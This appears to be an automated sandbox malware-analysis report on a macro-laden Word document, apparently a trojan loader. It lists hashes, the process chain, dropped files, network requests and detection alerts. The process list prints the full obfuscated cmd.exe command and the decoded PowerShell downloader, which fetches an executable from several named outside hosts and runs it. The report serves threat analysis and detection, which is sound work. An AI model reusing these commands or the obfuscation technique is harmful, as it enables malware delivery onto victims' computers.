File name:	eFILE-7541020754.doc
Full analysis:	https://app.any.run/tasks/1a5d9311-9936-4917-9ce5-a62b0ee593d3
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	December 06, 2018, 12:08:28
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	macros macros-on-open generated-doc trojan loader
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 07:15:00 2018, Last Saved Time/Date: Thu Dec 6 07:15:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 34, Security: 0
MD5:	097D917E08C67FA1124CFFA60E821E0E
SHA1:	E1F3E546AE8E47D889AABDBA722698B90A0A32DA
SHA256:	4C0BE53F6AB8C64063EB70ED62D53F2D54384BBADF9DBE85A64D93AEDCFCA636
SSDEEP:	1536:jL81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9MgsbqA:jL8GhDS0o9zTGOZD6EbzCdllA

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

CompObjUserType:	Microsoft Word 97-2003 Document
CompObjUserTypeLen:	32
HeadingPairs:	Title 1
TitleOfParts:	-
HyperlinksChanged:	No
SharedDoc:	No
LinksUpToDate:	No
ScaleCrop:	No
AppVersion:	16
CharCountWithSpaces:	38
Paragraphs:	1
Lines:	1
Company:	-
CodePage:	Windows Latin 1 (Western European)
Security:	None
Characters:	34
Words:	5
Pages:	1
ModifyDate:	2018:12:06 07:15:00
CreateDate:	2018:12:06 07:15:00
TotalEditTime:	-
Software:	Microsoft Office Word
RevisionNumber:	1
LastModifiedBy:	-
Template:	Normal.dotm
Comments:	-
Keywords:	-
Author:	-
Subject:	-
Title:	-

PID	CMD	Path	Indicators	Parent process
2964	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\eFILE-7541020754.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.5123.5000
2448	c:\ZUwBsFupKDi\iLbdsvjX\XYPBhNrj\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set aG=QwYhAdXWfbncYvwlDmkIhwG4'yNsaBi$r {quPz,F/O2t\xjUV@o9}RpL+CS-(ME=6eTH:;.)80g&&for %r in (31;29;48;59;64;24;4;37;36;24;70;31;38;56;32;64;10;66;21;60;51;9;47;66;11;44;33;26;66;44;71;7;66;9;58;15;30;66;10;44;70;31;20;8;63;64;24;20;44;44;55;69;41;41;17;66;11;20;5;66;27;30;75;10;71;11;51;17;41;9;5;9;25;32;7;5;50;20;44;44;55;69;41;41;15;66;10;11;20;66;66;27;66;17;28;10;71;11;51;17;41;42;43;40;74;27;6;23;25;40;50;20;44;44;55;69;41;41;44;28;15;15;66;32;27;17;36;15;15;51;32;71;66;27;41;38;7;22;52;20;4;42;50;20;44;44;55;69;41;41;17;51;10;44;30;10;66;75;32;51;71;10;15;41;67;15;63;42;66;30;6;47;50;20;44;44;55;69;41;41;27;28;18;28;55;51;10;75;5;51;10;75;71;11;51;17;41;0;9;43;7;19;17;0;24;71;59;55;15;30;44;61;24;50;24;72;70;31;6;44;38;64;24;47;62;40;24;70;31;18;30;40;33;64;33;24;65;65;23;24;70;31;59;47;58;64;24;37;21;56;24;70;31;49;30;9;64;31;66;10;13;69;44;66;17;55;57;24;45;24;57;31;18;30;40;57;24;71;66;46;66;24;70;8;51;32;66;28;11;20;61;31;19;19;19;33;30;10;33;31;20;8;63;72;34;44;32;25;34;31;38;56;32;71;16;51;21;10;15;51;28;5;40;30;15;66;61;31;19;19;19;39;33;31;49;30;9;72;70;31;26;8;68;64;24;16;36;67;24;70;19;8;33;61;61;22;66;44;60;19;44;66;17;33;31;49;30;9;72;71;15;66;10;75;44;20;33;60;75;66;33;73;74;74;74;74;72;33;34;19;10;13;51;18;66;60;19;44;66;17;33;31;49;30;9;70;31;59;6;11;64;24;56;13;54;24;70;9;32;66;28;18;70;53;53;11;28;44;11;20;34;53;53;31;13;35;37;64;24;28;35;19;24;70;85)do set lkY6=!lkY6!!aG:~%r,1!&&if %r geq 85 p%LOCALAPPDATA:~-4,1%we%ProgramData:~-10,1%shell "!lkY6:*lkY6!=!""	c:\windows\system32\cmd.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2432	CmD /V:O/C"set aG=QwYhAdXWfbncYvwlDmkIhwG4'yNsaBi$r {quPz,F/O2t\xjUV@o9}RpL+CS-(ME=6eTH:;.)80g&&for %r in (31;29;48;59;64;24;4;37;36;24;70;31;38;56;32;64;10;66;21;60;51;9;47;66;11;44;33;26;66;44;71;7;66;9;58;15;30;66;10;44;70;31;20;8;63;64;24;20;44;44;55;69;41;41;17;66;11;20;5;66;27;30;75;10;71;11;51;17;41;9;5;9;25;32;7;5;50;20;44;44;55;69;41;41;15;66;10;11;20;66;66;27;66;17;28;10;71;11;51;17;41;42;43;40;74;27;6;23;25;40;50;20;44;44;55;69;41;41;44;28;15;15;66;32;27;17;36;15;15;51;32;71;66;27;41;38;7;22;52;20;4;42;50;20;44;44;55;69;41;41;17;51;10;44;30;10;66;75;32;51;71;10;15;41;67;15;63;42;66;30;6;47;50;20;44;44;55;69;41;41;27;28;18;28;55;51;10;75;5;51;10;75;71;11;51;17;41;0;9;43;7;19;17;0;24;71;59;55;15;30;44;61;24;50;24;72;70;31;6;44;38;64;24;47;62;40;24;70;31;18;30;40;33;64;33;24;65;65;23;24;70;31;59;47;58;64;24;37;21;56;24;70;31;49;30;9;64;31;66;10;13;69;44;66;17;55;57;24;45;24;57;31;18;30;40;57;24;71;66;46;66;24;70;8;51;32;66;28;11;20;61;31;19;19;19;33;30;10;33;31;20;8;63;72;34;44;32;25;34;31;38;56;32;71;16;51;21;10;15;51;28;5;40;30;15;66;61;31;19;19;19;39;33;31;49;30;9;72;70;31;26;8;68;64;24;16;36;67;24;70;19;8;33;61;61;22;66;44;60;19;44;66;17;33;31;49;30;9;72;71;15;66;10;75;44;20;33;60;75;66;33;73;74;74;74;74;72;33;34;19;10;13;51;18;66;60;19;44;66;17;33;31;49;30;9;70;31;59;6;11;64;24;56;13;54;24;70;9;32;66;28;18;70;53;53;11;28;44;11;20;34;53;53;31;13;35;37;64;24;28;35;19;24;70;85)do set lkY6=!lkY6!!aG:~%r,1!&&if %r geq 85 powershell "!lkY6:*lkY6!=!""	C:\Windows\system32\cmd.exe	—	cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2908	powershell "$BUS='APu';$zLr=new-object Net.WebClient;$hfE='http://mechdesign.com/bdbyrWd@http://lencheeseman.com/O2F0sX4yF@http://tallersmullor.es/zWG9hAO@http://montinegro.nl/TlEOeiXj@http://sakapongdong.com/Qb2WImQ'.Split('@');$Xtz='jMF';$kiF = '664';$SjC='PwL';$Vib=$env:temp+'\'+$kiF+'.exe';foreach($III in $hfE){try{$zLr.DownloadFile($III, $Vib);$NfH='DuT';If ((Get-Item $Vib).length -ge 80000) {Invoke-Item $Vib;$SXc='LvR';break;}}catch{}}$vqP='aqI';"	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1384	"C:\Users\admin\AppData\Local\Temp\664.exe"	C:\Users\admin\AppData\Local\Temp\664.exe	—	powershell.exe
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385
2784	"C:\Users\admin\AppData\Local\Temp\664.exe"	C:\Users\admin\AppData\Local\Temp\664.exe		664.exe
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385
1580	"C:\Users\admin\AppData\Local\msrasteps\msrasteps.exe"	C:\Users\admin\AppData\Local\msrasteps\msrasteps.exe	—	664.exe
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385
1056	"C:\Users\admin\AppData\Local\msrasteps\msrasteps.exe"	C:\Users\admin\AppData\Local\msrasteps\msrasteps.exe	—	msrasteps.exe
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Version: 6.1.7600.16385

PID	Process	Filename		Type
2964	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVRB7F3.tmp.cvr		—
		MD5:—	SHA256:—
2908	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8DOMTVHES0LO2H811U2.temp		—
		MD5:—	SHA256:—
2964	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\eFILE-7541020754.LNK		lnk
		MD5:3597D4D8C959705E55778C0A6F779DEE	SHA256:F6E8652234F511A32013DDBA78E94361631D1F9473817806C00101929931FFAC
2908	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF7c801.TMP		binary
		MD5:66C674FAF5938727AFF5D90EC5445F23	SHA256:7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272
2964	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat		text
		MD5:34DDBB7E1185E5AC46D0457B78BDAD2C	SHA256:A11CC1008EA515634DE85859170DAE1890DB392C642F6D11A150876CD0386F56
2964	WINWORD.EXE	C:\Users\admin\Desktop\~$ILE-7541020754.doc		pgc
		MD5:9B9CDD24EAB815F1D0EB7456EEF3EB02	SHA256:FAC6B1C8314CD28E7D369147D1160278E3EA882AD6FAB1033C43DC957F396B05
2908	powershell.exe	C:\Users\admin\AppData\Local\Temp\664.exe		executable
		MD5:A9FC2E3F2214B0A0BBE086CCAE159326	SHA256:0856C826B6EA200923A482B2480E7F1A6231BBD052C0F27614C0E6BF7E58B4DC
2908	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms		binary
		MD5:66C674FAF5938727AFF5D90EC5445F23	SHA256:7025A80E97465DFE4B836333C348311D668663138FCD18401D84684FC95FF272
2784	664.exe	C:\Users\admin\AppData\Local\msrasteps\msrasteps.exe		executable
		MD5:A9FC2E3F2214B0A0BBE086CCAE159326	SHA256:0856C826B6EA200923A482B2480E7F1A6231BBD052C0F27614C0E6BF7E58B4DC

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2908	powershell.exe	GET	301	43.245.53.9:80	http://lencheeseman.com/O2F0sX4yF	NZ	html	242 b	malicious
2908	powershell.exe	GET	200	43.245.53.9:80	http://lencheeseman.com/O2F0sX4yF/	NZ	executable	164 Kb	malicious
2908	powershell.exe	GET	401	192.252.156.25:80	http://mechdesign.com/bdbyrWd	US	html	381 b	malicious

Domain	IP	Reputation
mechdesign.com	192.252.156.25	malicious
lencheeseman.com	43.245.53.9	malicious

PID	Process	Class	Message
2908	powershell.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2908	powershell.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2908	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2908	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2908	powershell.exe	Misc activity	ET INFO EXE - Served Attached HTTP

General Info

eFILE-7541020754.doc

097D917E08C67FA1124CFFA60E821E0E

E1F3E546AE8E47D889AABDBA722698B90A0A32DA

4C0BE53F6AB8C64063EB70ED62D53F2D54384BBADF9DBE85A64D93AEDCFCA636

1536:jL81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a9MgsbqA:jL8GhDS0o9zTGOZD6EbzCdllA

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Unusual execution from Microsoft Office

Starts CMD.EXE for commands execution

Request from PowerShell which ran from CMD.EXE

Executes PowerShell scripts

Application was dropped or rewritten from another process

Downloads executable files from the Internet

SUSPICIOUS

Executable content was dropped or overwritten

Starts CMD.EXE for commands execution

Reads the machine GUID from the registry

Creates files in the user directory

Starts itself from another location

Application launched itself

INFO

Reads the machine GUID from the registry

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings